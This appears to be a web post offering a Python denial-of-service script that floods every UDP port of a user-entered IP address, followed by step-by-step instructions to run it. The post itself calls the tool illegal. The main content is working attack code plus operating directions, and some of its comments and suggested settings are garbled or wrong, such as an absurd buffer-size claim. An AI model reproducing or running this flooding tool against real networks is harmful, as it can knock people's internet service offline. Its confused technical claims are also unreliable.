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Disclaimer: This is illegal, just like basically everything else on Project Vespera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Explaination this is a denial of service tool meaning it turns of the internet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1: take my code that I made in 8th grade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socket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threading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datetime import datetime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queue import Queue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Code Time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 = datetime.now()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hour, minute, day, month, year = now.hour, now.minute, now.day, now.month, now.year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sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)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sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 2 ** 20)  # Set larger buffer size (1000000000000000000000000000000000000000000000000000 GB)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bytes_per_packet = None  # To be initialized later with the user's specified packet size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os.system("cls" if os.name == "nt" else "clear")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print("Author   : Project Vespera")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print("-" * 50)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get_target():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True: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ip = input("IP Target : ")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socket.inet_aton(ip)  # Validate the IP address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ip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except socket.error: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print("Invalid IP address format. Please try again.")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ip = get_target()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get_custom_packet_size():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True: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custom_packet_size = input("Enter the custom packet size in bytes (default 1485): ")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not custom_packet_size.strip():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return 1485  # Default packet size if input is empty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packet_size = int(custom_packet_size)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packet_size &lt;= 0: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raise ValueError("Packet size must be a positive integer.")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packet_size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except ValueError as e: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print(f"Invalid input: {e}. Please try again.")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bytes_per_packet = random.randbytes(get_custom_packet_size())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Function to send packets to a range of ports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send_packets(ip, start_port, end_port, packet_queue):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max_buffer_size = 1  # Maximum buffer size (adjust as needed)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True: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port in range(start_port, end_port + 1):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sock.sendto(bytes_per_packet, (ip, port))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packet_queue.qsize() &lt; max_buffer_size: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packet_queue.put(None)  # Placeholder for sent packet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time.sleep(0.0001)  # Decreased sleep time to send packets faster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except (socket.error, BlockingIOError) as e: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print("Error: %s" % e)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print("Waiting for a moment before resuming...")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Start sending packets to a range of ports in a separate thread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packet_queue = Queue()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send_thread = threading.Thread(target=send_packets, args=(ip, 1, 65535, packet_queue))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send_thread.start()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Timer to display attack duration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start_time = time.time()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True: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time.sleep(0.001)  # Decreased sleep time to update the timer more frequently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elapsed_time = time.time() - start_time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m, s = divmod(elapsed_time, 60)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h, m = divmod(m, 60)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print(f"Attack duration: {int(h):02d}:{int(m):02d}:{int(s):02d}", end='\r', flush=True)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packet_queue.get()  # Remove a packet from the queue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except KeyboardInterrupt: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print("\nStopping the attack...")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send_thread.join()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sock.close()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2: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Open the text editor of your choice and copy the code into it and save it as a .py file which is python also make sure you have python installed and save the file to your desktop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3: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Open terminal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Then type cd desktop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Then type python3 [yourfilename].py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Now you are running the file, but not actually doing a DOS yet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Then go to your settings and get your network's IP and enter it into the program and hit enter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then it will ask for packet size type 100000000000000 and hit enter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Now your network is cooked until you close the terminal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